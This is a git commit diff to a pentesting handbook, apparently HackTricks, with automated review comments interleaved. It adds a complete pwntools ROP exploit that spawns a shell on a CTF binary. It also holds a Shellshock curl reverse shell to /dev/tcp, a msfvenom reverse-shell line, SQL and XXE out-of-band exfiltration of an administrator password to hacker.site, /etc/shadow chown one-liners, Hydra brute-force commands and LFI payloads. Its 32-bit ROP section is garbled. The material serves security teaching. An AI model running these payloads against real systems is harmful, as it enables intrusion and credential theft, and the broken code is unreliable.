GitBook: [master] 19 pages and 4 assets modified

This commit is contained in:
CPol 2021-09-25 16:33:43 +00:00 committed by gitbook-bot
parent c59e78e9c2
commit 9d85603d35
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF
21 changed files with 219 additions and 78 deletions


@ -514,7 +514,7 @@
* [Linux Exploiting \(Basic\) \(SPA\)](exploiting/linux-exploiting-basic-esp/README.md)
* [Format String Template](exploiting/linux-exploiting-basic-esp/format-string-template.md)
* [ROP - Syscall execv](exploiting/linux-exploiting-basic-esp/rop-syscall-execv.md)
* [ROP - call sys\_execve](exploiting/linux-exploiting-basic-esp/rop-syscall-execv.md)
* [ROP - Leaking LIBC address](exploiting/linux-exploiting-basic-esp/rop-leaking-libc-address.md)
* [ROP-PWN template](exploiting/linux-exploiting-basic-esp/rop-pwn-template.md)
* [Bypassing Canary & PIE](exploiting/linux-exploiting-basic-esp/bypassing-canary-and-pie.md)
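Review bot: The renamed entry `* [ROP - call sys\_execve](exploiting/linux-exploiting-basic-esp/rop-syscall-execv.md)` now carries a title that says `sys_execve` while the target file is still named `rop-syscall-execv.md`; that works for GitBook routing, but if the file is ever renamed to match the title, this link and the `{% page-ref page="rop-syscall-execv.md" %}` reference added later in this commit have to change together, so it is worth either renaming the file now or leaving a note that the mismatch is intentional.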


@ -27,12 +27,6 @@ Heap**
**Stack**
## **1.STACK OVERFLOWS**
> buffer overflow, buffer overrun, stack overrun, stack smashing
Fallo de segmentación o violación de segmento: Cuando se intenta acceder a una dirección de memoria que no ha sido asignada al proceso.
**Sección BSS**: Variables globales o estáticas sin inicializar
```text
@ -51,19 +45,27 @@ int i = 5;
**Sección STACK**: La pila \(Argumentos pasados, cadenas de entorno \(env\), variables locales…\)
## **1.STACK OVERFLOWS**
> buffer overflow, buffer overrun, stack overrun, stack smashing
Fallo de segmentación o violación de segmento: Cuando se intenta acceder a una dirección de memoria que no ha sido asignada al proceso.
\*\*\*\*
Para obtener la dirección de una función dentro de un programa se puede hacer:
```text
objdump -d ./PROGRAMA | grep FUNCION
```
Si necesitas una dirección del Stack el GDB modifica variables de entorno que hae que cambie la dirección con respecto ala ejecución normal:
* `unset env LINES`
* `unset env COLUMNS`
* `set env _=path` donde path es la ruta absoluta al programa
* explotar el programa usando la ruta absoluta
* asegúrate de que PWD y OLDPWD son las mismas que en gdb
## ROP
### Call to sys\_execve
{% page-ref page="rop-syscall-execv.md" %}
## **2.SHELLCODE**
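Review bot: Typos in the added sentence `Si necesitas una dirección del Stack el GDB modifica variables de entorno que hae que cambie la dirección con respecto ala ejecución normal:`: `hae` should be `hace` and `ala` should be `a la`, and a comma after `Stack` would help the reading. The stray `\*\*\*\*` line above `Para obtener la dirección de una función` renders as an empty bold marker and should be dropped. The same five-step list (`unset env LINES`, `unset env COLUMNS`, `set env _=path`, same absolute path, same `PWD`/`OLDPWD`) is added in English to the GDB page later in this commit; keeping one copy and linking to it from here would stop the two lists drifting apart.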


@ -1,51 +1,164 @@
# ROP - Syscall execv
# ROP - call sys\_execve
The objective is to call the **syscall \(execv\)** from a ROP controlling the value of registries: _RDI, RSI, RDX, RAX_ and obviously the _RIP_ \(the other ones doesn't matters\), and controlling somewhere to write _"/bin/sh"_
In order to prepare the call for the **syscall** it's needed the following configuration:
* **RDI**: Pointing to the string "/bin/bash"
* **RSI**: Null
* **RDX**: Null
* **RAX**: Value **0x3b** for x64 and **0xb** for x32, because this will call **execv**
* `rax: 59 Specify sys_execve`
* `rdi: ptr to "/bin/sh" specify file to execute`
* `rsi: 0 specify no arguments passed`
* `rdx: 0 specify no environment variables passed`
So, basically it's needed to write the string `/bin/sh` somewhere and then perform the `syscall` \(being aware of the padding needed to control the stack\).
## Control the registers
Let's start by finding **how to control those registers**:
```c
ROPgadget --binary speedrun-001 | grep -E "pop (rdi|rsi|rdx\rax) ; ret"
0x0000000000415664 : pop rax ; ret
0x0000000000400686 : pop rdi ; ret
0x00000000004101f3 : pop rsi ; ret
0x00000000004498b5 : pop rdx ; ret
```
With these addresses it's possible to **write the content in the stack and load it into the registers**.
## Write string
### Writable memory
Frist you need to find a writable place in the memory
```bash
ROPgadget --binary vulnbinary | grep syscall
ROPgadget --binary vulnbinary | grep "rdi\|rsi\|rdx\|rax" | grep pop
gef> vmmap
[ Legend: Code | Heap | Stack ]
Start End Offset Perm Path
0x0000000000400000 0x00000000004b6000 0x0000000000000000 r-x /home/kali/git/nightmare/modules/07-bof_static/dcquals19_speedrun1/speedrun-001
0x00000000006b6000 0x00000000006bc000 0x00000000000b6000 rw- /home/kali/git/nightmare/modules/07-bof_static/dcquals19_speedrun1/speedrun-001
0x00000000006bc000 0x00000000006e0000 0x0000000000000000 rw- [heap]
```
## Writing
### Write String
If you can somehow write to an address and then get the address of where you have written then this step is unnecessary.
Then you need to find a way to write arbitrary content in this address
Elsewhere, you may search for some **write-what-where**.
As is explained in this tutorial: [https://failingsilently.wordpress.com/2017/12/14/rop-chain-shell/](https://failingsilently.wordpress.com/2017/12/14/rop-chain-shell/) you have to find something that allows you to save some value inside a registry and then save it to some controlled address inside another registry. For example some `pop eax; ret` , `pop edx: ret` , `mov eax, [edx]`
You can find mov gadgets doing: `ROPgadget --binary vulnbinary | grep mov`
### Finding a place to write
If you have found some **write-what-where** and can control the needed registries to call execv, there is only left finding a place to write.
```bash
objdump -x vulnbinary | grep ".bss" -B1
CONTENTS, ALLOC, LOAD, DATA
23 .bss 00000010 00403418 00403418 00002418 2**3
```python
ROPgadget --binary speedrun-001 | grep " : mov qword ptr \["
mov qword ptr [rax], rdx ; ret #Write in the rax address the content of rdx
```
In this case: **0x403418**
#### 32 bits
### **Writing** _**"/bin/sh"**_
```python
'''
Lets write "/bin/sh" to 0x6b6000
```text
buffer += address(pop_eax) # place value into EAX
buffer += "/bin" # 4 bytes at a time
buffer += address(pop_edx) # place value into edx
buffer += address(writable_memory)
buffer += address(writewhatwhere)
pop rdx, 0x2f62696e2f736800
pop rax, 0x6b6000
mov qword ptr [rax], rdx
'''
buffer += address(pop_eax)
buffer += "//sh"
buffer += address(pop_edx)
buffer += address(writable_memory + 4)
buffer += address(writewhatwhere)
rop += popRdx # place value into EAX
rop += "/bin" # 4 bytes at a time
rop += popRax # place value into edx
rop += p32(0x6b6000) # Writable memory
rop += writeGadget #Address to: mov qword ptr [rax], rdx
rop += popRdx
rop += "//sh"
rop += popRax
rop += p32(0x6b6000 + 4)
rop += writeGadget
```
#### 64 bits
```python
'''
Lets write "/bin/sh" to 0x6b6000
pop rdx, 0x2f62696e2f736800
pop rax, 0x6b6000
mov qword ptr [rax], rdx
'''
rop = ''
rop += popRdx
rop += "/bin/sh\x00" # The string "/bin/sh" in hex with a null byte at the end
rop += popRax
rop += p64(0x6b6000) # Writable memory
rop += writeGadget #Address to: mov qword ptr [rax], rdx
```
## Example
```python
from pwn import *
target = process('./speedrun-001')
#gdb.attach(target, gdbscript = 'b *0x400bad')
# Establish our ROP Gadgets
popRax = p64(0x415664)
popRdi = p64(0x400686)
popRsi = p64(0x4101f3)
popRdx = p64(0x4498b5)
# 0x000000000048d251 : mov qword ptr [rax], rdx ; ret
writeGadget = p64(0x48d251)
# Our syscall gadget
syscall = p64(0x40129c)
'''
Here is the assembly equivalent for these blocks
write "/bin/sh" to 0x6b6000
pop rdx, 0x2f62696e2f736800
pop rax, 0x6b6000
mov qword ptr [rax], rdx
'''
rop = ''
rop += popRdx
rop += "/bin/sh\x00" # The string "/bin/sh" in hex with a null byte at the end
rop += popRax
rop += p64(0x6b6000)
rop += writeGadget
'''
Prep the four registers with their arguments, and make the syscall
pop rax, 0x3b
pop rdi, 0x6b6000
pop rsi, 0x0
pop rdx, 0x0
syscall
'''
rop += popRax
rop += p64(0x3b)
rop += popRdi
rop += p64(0x6b6000)
rop += popRsi
rop += p64(0)
rop += popRdx
rop += p64(0)
rop += syscall
# Add the padding to the saved return address
payload = "0"*0x408 + rop
# Send the payload, drop to an interactive shell to use our new shell
target.sendline(payload)
target.interactive()
```
## References
* [https://guyinatuxedo.github.io/07-bof\_static/dcquals19\_speedrun1/index.html](https://guyinatuxedo.github.io/07-bof_static/dcquals19_speedrun1/index.html)
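Review bot: The gadget search `ROPgadget --binary speedrun-001 | grep -E "pop (rdi|rsi|rdx\rax) ; ret"` has `\rax` where `|rax` is meant, so the `pop rax ; ret` gadget shown in the output would not actually match that regex; that block is also fenced as ```c and the objdump/ROPgadget output under "Finding a place to write" as ```python, both should be ```bash or ```text. The "32 bits" block is a merge of two drafts: the `'''` docstring is never closed properly because a ```text fence was left inside it, the `buffer += address(pop_eax)` lines coexist with the `rop += popRdx` lines, and the comments on `rop += popRdx # place value into EAX` and `rop += popRax # place value into edx` are swapped; beyond that, `p32(...)` is paired with `mov qword ptr [rax], rdx`, a 64-bit gadget, so a 32-bit section needs 32-bit gadgets (the `pop eax`/`pop edx`/`mov [edx], eax` style from the linked tutorial). Note also that `mov eax, [edx]`, given as the write-what-where example, is a memory read; the write form is `mov [edx], eax`. The `rop = ''` / `rop += p64(...)` / `payload = "0"*0x408 + rop` lines mix `str` and `bytes` and raise `TypeError` under Python 3 pwntools; use `rop = b''`, `b"/bin/sh\x00"` and `b"0"*0x408`. Minor: the intro says RDI should point at `"/bin/bash"` while every example writes `/bin/sh`; "registries" should be "registers", "Frist" should be "First", "the other ones doesn't matters" should be "the others do not matter"; and the `.bss` address `0x403418` found with objdump is never used (the examples write to `0x6b6000` taken from `vmmap` of a different binary), which is confusing.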


@ -24,7 +24,7 @@ msfvenom /p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> [EXITFUNC=thread]
apt-get install gdb
```
### Parameters:
### Parameters
**-q** --&gt; No show banner
**-x &lt;file&gt;** --&gt; Auto-execute GDB instructions from here
@ -91,6 +91,32 @@ pattern search "avaaawaa" #Search for the offset of that substring
pattern search $rsp #Search the offset given the content of $rsp
```
### Tricks
#### GDB same addresses
While debugging GDB will have **slightly different addresses than the used by the binary when executed.** You can make GDB have the same addresses by doing:
* `unset env LINES`
* `unset env COLUMNS`
* `set env _=<path>` _Put the absolute path to the binary_
* Exploit the binary using the same absolute route
* `PWD` and `OLDPWD` must be the same when using GDB and when exploiting the binary
#### Backtrace to find functions called
When you have a **statically linked binary** all the functions will belong to the binary \(and no to external libraries\). In this case it will be difficult to **identify the flow that the binary follows to for example ask for user input**.
You can easily identify this flow by **running** the binary with **gdb** until you are asked for input. Then, stop it with **CTRL+C** and use the **`bt`** \(**backtrace**\) command to see the functions called:
```text
gef➤ bt
#0 0x00000000004498ae in ?? ()
#1 0x0000000000400b90 in ?? ()
#2 0x0000000000400c1d in ?? ()
#3 0x00000000004011a9 in ?? ()
#4 0x0000000000400a5a in ?? ()
```
### GDB server
`gdbserver --multi 0.0.0.0:23947` \(in IDA you have to fill the absolute path of the executable in the Linux machine and in the Windows machine\)
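Review bot: Grammar in the added text: `\(and no to external libraries\)` should read `and not to external libraries`, `to for example ask for user input` reads better as `to, for example, ask for user input`, and `Exploit the binary using the same absolute route` should say `absolute path`, matching `set env _=<path>` two lines above. The sample backtrace shows `in ?? ()` for every frame, so it would help to say that in a stripped static binary `bt` only gives you the return addresses and the next step is to disassemble around each of them (for example with `x/10i` or `disassemble` on that address) to recognise the function, otherwise readers may expect names to appear.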


@ -744,7 +744,7 @@ And in order to read a file you could do:
print(open("/etc/shadow", "r").read())
```
#### Example with _\*\*_Environment \(Docker breakout\)
#### Example with \_\*\*\_Environment \(Docker breakout\)
You can check the enabled capabilities inside the docker container using:
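Review bot: Both versions of the heading `#### Example with _\*\*_Environment \(Docker breakout\)` carry escape residue (`_\*\*_`, now re-escaped as `\_\*\*\_`) that renders as literal underscores and asterisks in the title; rather than escaping it again, drop the markers so the heading reads `#### Example with Environment \(Docker breakout\)`.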
@ -1124,6 +1124,7 @@ python -c 'import os;os.chown("/etc/shadow",1000,1000)'
```
Or with the **`ruby`** binary having this capability:
```bash
ruby -e 'require "fileutils"; FileUtils.chown(1000, 1000, "/etc/shadow")'
```


@ -128,7 +128,7 @@ The response is a JSON dictionary with some important data like:
* Signed using the **device identity certificate \(from APNS\)**
* **Certificate chain** includes expired **Apple iPhone Device CA**
![](../../../.gitbook/assets/image%20%28567%29%20%281%29%20%282%29%20%282%29%20%282%29%20%282%29.png)
![](../../../.gitbook/assets/image%20%28567%29%20%281%29%20%282%29%20%282%29%20%282%29%20%282%29%20%282%29.png)
### Step 6: Profile Installation


@ -5,7 +5,7 @@
This technique can be use to extract information from a user when an **HTML injection is found**. This is very useful if you **don't find any way to exploit a** [**XSS** ](xss-cross-site-scripting/)but you can **inject some HTML tags**.
It is also useful if some **secret is saved in clear text** in the HTML and you want to **exfiltrate** it from the client, or if you want to mislead some script execution.
Several techniques commented here can be used to bypass some ****[**Content Security Policy**](content-security-policy-csp-bypass.md) by exfiltrating information in unexpected ways \(html tags, CSS, http-meta tags, forms, base...\).
Several techniques commented here can be used to bypass some **\*\*\[**Content Security Policy\*\*\]\(content-security-policy-csp-bypass.md\) by exfiltrating information in unexpected ways \(html tags, CSS, http-meta tags, forms, base...\).
## Main Applications
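Review bot: The rewritten line `Several techniques commented here can be used to bypass some **\*\*\[**Content Security Policy\*\*\]\(content-security-policy-csp-bypass.md\)` escapes the link's brackets and parentheses, so the link to `content-security-policy-csp-bypass.md` no longer renders at all; the empty `****` pair in the original line is what confused the formatter. Write it as `Several techniques commented here can be used to bypass some [**Content Security Policy**](content-security-policy-csp-bypass.md) by exfiltrating ...` and the escaping goes away.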
@ -207,8 +207,7 @@ This can be mitigated with something like: _**sandbox= allow-scripts allow-to
### &lt;meta abuse
You could use **`meta http-equiv`** to perform **several actions** like setting a Cookie: `<meta http-equiv="Set-Cookie" Content="SESSID=1">` or performing a redirect \(in 5s in this case\): `<meta name="language" content="5;http://attacker.svg" HTTP-EQUIV="refresh" />`
You could use **`meta http-equiv`** to perform **several actions** like setting a Cookie: `<meta http-equiv="Set-Cookie" Content="SESSID=1">` or performing a redirect \(in 5s in this case\): `<meta name="language" content="5;http://attacker.svg" HTTP-EQUIV="refresh" />`
This can be **avoided** with a **CSP** regarding **http-equiv** \( `Content-Security-Policy: default-src 'self';`, or `Content-Security-Policy: http-equiv 'self';`\)
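Review bot: The mitigation line `This can be **avoided** with a **CSP** regarding **http-equiv** \( ... or `Content-Security-Policy: http-equiv 'self';`\)` cites a directive that does not exist: `http-equiv` is not a CSP directive name and browsers ignore unknown directives, and `default-src 'self'` does not govern a `<meta http-equiv="refresh">` navigation either, since CSP restricts resource loading rather than meta refresh. Modern Chrome and Firefox also no longer honour `<meta http-equiv="Set-Cookie">`. Suggest stating that the real defence for this section is preventing the HTML injection itself (output encoding, sanitisation) and dropping the two CSP examples.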
@ -227,21 +226,19 @@ Not all the ways to leak connectivity in HTML will be useful for Dangling Markup
## Brute-Force Detection List
{% embed url="https://github.com/carlospolop/Auto\_Wordlists/blob/main/wordlists/dangling\_markup.txt" %}
{% embed url="https://github.com/carlospolop/Auto\_Wordlists/blob/main/wordlists/dangling\_markup.txt" caption="" %}
## References
All the techniques presented here and more can view reviewed with more details in:
{% embed url="http://lcamtuf.coredump.cx/postxss/" %}
{% embed url="http://lcamtuf.coredump.cx/postxss/" caption="" %}
Another HTML tags that can be abused can be find here:
{% embed url="http://www.thespanner.co.uk/2011/12/21/html-scriptless-attacks/" %}
{% embed url="http://www.thespanner.co.uk/2011/12/21/html-scriptless-attacks/" caption="" %}
More info:
{% embed url="https://portswigger.net/research/evading-csp-with-dom-based-dangling-markup" %}
{% embed url="https://portswigger.net/research/evading-csp-with-dom-based-dangling-markup" caption="" %}


@ -29,7 +29,7 @@ wfuzz -c -w ./lfi2.txt --hw 0 http://10.10.10.10/nav.php?page=../../../../../../
**Mixing several \*nix LFI lists and adding more paths I have created this one:**
{% embed url="https://github.com/carlospolop/Auto\_Wordlists/blob/main/wordlists/file\_inclusion\_linux.txt" %}
{% embed url="https://github.com/carlospolop/Auto\_Wordlists/blob/main/wordlists/file\_inclusion\_linux.txt" caption="" %}
Try also to change `/` for `\`
Try also to add `../../../../../`
@ -40,7 +40,7 @@ A list that uses several techniques to find the file /etc/password \(to check if
Merging several lists I have created:
{% embed url="https://github.com/carlospolop/Auto\_Wordlists/blob/main/wordlists/file\_inclusion\_windows.txt" %}
{% embed url="https://github.com/carlospolop/Auto\_Wordlists/blob/main/wordlists/file\_inclusion\_windows.txt" caption="" %}
Try also to change `/` for `\`
Try also to remove `C:/` and add `../../../../../`
@ -53,7 +53,7 @@ Check the LFI list of linux.
## Basic LFI and bypasses
All the examples are for Local File Inclusion but could be applied to Remote File Inclusion also \(page=[http://myserver.com/phpshellcode.txt\](http://myserver.com/phpshellcode.txt\)\).
All the examples are for Local File Inclusion but could be applied to Remote File Inclusion also \(page=[http://myserver.com/phpshellcode.txt\](http://myserver.com/phpshellcode.txt%29\).
```text
http://example.com/index.php?page=../../../etc/passwd
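Review bot: Changing `phpshellcode.txt\)\)` to `phpshellcode.txt%29\)` percent-encodes the closing parenthesis into the link target, so the rendered link now points at `http://myserver.com/phpshellcode.txt)`; the escaping trouble comes from wrapping an already-linked URL in parentheses together with the `\]` escape. Write it once, as `\(page=[http://myserver.com/phpshellcode.txt](http://myserver.com/phpshellcode.txt)\)`, and no extra escaping is needed.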
@ -330,7 +330,7 @@ Other possible log paths:
/var/log/httpd/error_log
```
Fuzzing wordlist: https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/LFI
Fuzzing wordlist: [https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/LFI](https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/LFI)
### Via Email


@ -248,6 +248,7 @@ select load_file(concat('\\\\',version(),'.hacker.site\\a.txt'));
```
### Out of band data exfiltration via XXE
```sql
a' UNION SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://'||(SELECT password FROM users WHERE username='administrator')||'.hacker.site/"> %remote;]>'),'/l') FROM dual-- -
```


@ -265,7 +265,7 @@ Entry_1:
print(s.run_ps('ipconfig'))
https://book.hacktricks.xyz/pentesting/pentesting-winrm
Entry_2:
Name: Hydra Brute Force
Desctiption: Need User
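Review bot: `Desctiption: Need User` is misspelled in the `Hydra Brute Force` entry; the key is `Description:` in the other entries of this file, and any parser keyed on `Description` will not find this field. Fix the key while this block is being touched.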


@ -225,7 +225,7 @@ Entry_5:
Name: Browser Connection
Description: Connect with Browser
Note: ftp://anonymous:anonymous@{IP}
Entry_6:
Name: Hydra Brute Force
Description: Need Username


@ -374,10 +374,10 @@ Entry_5:
Name: LdapSearch Big Dump
Description: Need Naming Context to do big dump
Command: ldapsearch -h {IP} -x -b "{Naming_Context}"
Entry_6:
Name: Hydra Brute Force
Description: Need User
Command: hydra -l {Username} -P {Big_Passwordlist} {IP} ldap2 -V -f
Command: hydra -l {Username} -P {Big_Passwordlist} {IP} ldap2 -V -f
```


@ -111,7 +111,7 @@ Entry_4:
Name: Nmap
Description: Scan for POP info
Command: nmap --script "pop3-capabilities or pop3-ntlm-info" -sV -p 110 {IP}
Entry_5:
Name: Hydra Brute Force
Description: Need User


@ -499,7 +499,7 @@ Entry_4:
Name: Nmap Smb Scan 2
Description: SMB Vuln Scan With Nmap (Less Specific)
Command: nmap --script smb-vuln* -Pn -p 139,445 {IP}
Entry_5:
Name: Hydra Brute Force
Desctiption: Need User
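Review bot: Same typo as in the WinRM entry: `Desctiption: Need User` should be `Description: Need User`, matching the `Description:` key used by `Nmap Smb Scan 2` just above it; the field will otherwise be skipped by anything that reads these entries by key.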


@ -74,7 +74,7 @@ Or **automate** this with **nmap** plugin `smtp-ntlm-info.nse`
Some SMTP servers auto-complete a sender's address when command "MAIL FROM" is issued without a full address, disclosing its internal name:
```
```text
220 somedomain.com Microsoft ESMTP MAIL Service, Version: Y.Y.Y.Y ready at Wed, 15 Sep 2021 12:13:28 +0200
EHLO all
250-somedomain.com Hello [x.x.x.x]
@ -507,7 +507,7 @@ Entry_6:
Name: Find MX Servers
Description: Find MX servers of an organization
Command: dig +short mx {Domain_Name}
Entry_7:
Name: Hydra Brute Force
Description: Need Nothing


@ -210,7 +210,7 @@ Entry_4:
Name: Nmap
Description: Nmap snmp (no brute)
Command: nmap --script "snmp* and not snmp-brute" {IP}
Entry_5:
Name: Hydra Brute Force
Description: Need Nothing


@ -287,3 +287,4 @@ Entry_1:
Description: Need Username
Command: hydra -v -V -u -l {Username} -P {Big_Passwordlist} -t 1 -u {IP} ssh
```


@ -373,7 +373,7 @@ Entry_10:
Command: |
?What is the location of the wp-login.php? Example: /Yeet/cannon/wp-login.php
wpscan --url {Web_Proto}://{IP}{1} --enumerate ap,at,cb,dbe && wpscan --url {Web_Proto}://{IP}{1} --enumerate u,tt,t,vp --passwords {Big_Passwordlist} -e
Entry_11:
Name: WordPress Hydra Brute Force
Description: Need User (admin is default)
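Review bot: In `wpscan --url {Web_Proto}://{IP}{1} --enumerate u,tt,t,vp --passwords {Big_Passwordlist} -e` the trailing `-e` is a bare `--enumerate` with no argument, which duplicates the explicit `--enumerate u,tt,t,vp` earlier in the same command; drop it, or state which enumeration it is meant to add. The `?What is the location of the wp-login.php?` prompt should also say it expects a path relative to the site root, as the example `/Yeet/cannon/wp-login.php` shows.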


@ -13,7 +13,7 @@ Exploiting this vulnerability the **page could throw an error**.
You could **find** this vulnerability noticing that it is using an **old Apache version** and **cgi\_mod** \(with cgi folder\) or using **nikto**.
#### **Test**
### **Test**
Most tests are based in echo something and expect that that string is returned in the web response. If you think a page may be vulnerable, search for all the cgi pages and test them.
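Review bot: The heading promotion `#### **Test**` to `### **Test**` is consistent with `### Exploit` further down, fine; while editing this block, the context sentence `Most tests are based in echo something and expect that that string is returned in the web response` should read `Most tests are based on echoing a string and checking that it is returned in the web response`.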
@ -23,7 +23,7 @@ Most tests are based in echo something and expect that that string is returned i
nmap 10.2.1.31 -p 80 --script=http-shellshock --script-args uri=/cgi-bin/admin.cgi
```
#### **Curl \(reflected, blind and out-of-band\)**
### **Curl \(reflected, blind and out-of-band\)**
```bash
# Reflected
@ -40,7 +40,7 @@ curl -H 'Cookie: () { :;}; /bin/bash -i >& /dev/tcp/10.10.10.10/4242 0>&1' http:
python shellshocker.py http://10.11.1.71/cgi-bin/admin.cgi
```
#### Exploit
### Exploit
```bash
#Bind Shell